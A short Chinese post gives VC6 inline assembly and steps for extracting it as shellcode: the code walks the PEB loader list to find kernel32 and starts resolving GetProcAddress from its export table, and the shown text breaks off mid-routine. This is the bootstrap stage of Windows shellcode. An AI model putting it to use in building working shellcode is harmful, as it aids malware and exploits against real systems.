此代码在vc6下直接编译,提取shellcode时进行debug模式,打开内存窗口,复制出二进制代码,整理成shellcode就可以了
代码修改而来原文地址:http://hi.baidu.com/egodcore/item/c13e67fe197c940fc6dc45f5
int main()
{
__asm{
nop;
nop;
nop;
nop;
nop;
nop;
nop;
push ebp;
mov esi,fs:0x30; //PEB
mov esi, [esi + 0x0C]; //+0x00c Ldr : Ptr32 _PEB_LDR_DATA
mov esi, [esi + 0x1C]; //+0x01c InInitializationOrderModuleList : _LIST_ENTRY
next_module:
mov ebp, [esi + 0x08];
mov edi, [esi + 0x20];
mov esi, [esi];
cmp [edi + 12*2],cl;
jne next_module;
mov edi,ebp;
//寻找GetProcAddress地址
sub esp,100;
mov ebp,esp;
mov eax,[edi+3ch];//PE头
mov edx,[edi+eax+78h]
add edx,edi;
mov ecx,[edx+18h];//函数数量
mov ebx,[edx+20h];
add ebx,edi;
search: